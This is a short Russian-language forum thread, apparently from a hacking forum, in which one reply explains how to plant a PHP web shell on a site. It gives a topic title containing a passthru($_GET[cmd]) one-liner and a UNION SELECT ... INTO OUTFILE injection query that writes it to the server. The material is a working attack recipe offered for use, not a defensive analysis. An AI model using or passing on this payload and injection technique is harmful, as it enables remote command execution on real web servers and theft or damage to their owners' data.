да возможно, используя запросы wget

Запросы wget здесь нипричем =)

действия примерно такие(на примере форума):
создаешь топик с именем <?php passthru($_GET[cmd]) ?> и
потом через sql-иньекцию выполняешь запрос опять же что-то типа -1 UNION SELECT topic_name, null, null FROM bb_topics INTO OUTFILE абсолютный_путь_к_шеллу WHERE topic_id = номер_топика

http://forum.antichat.ru/thread19605.html

Тут написано, как получить шелл с помощью SQL-inj

Верно, спасибо за расширеный ответ.

Пользуемся поиском.
Тема закрыта.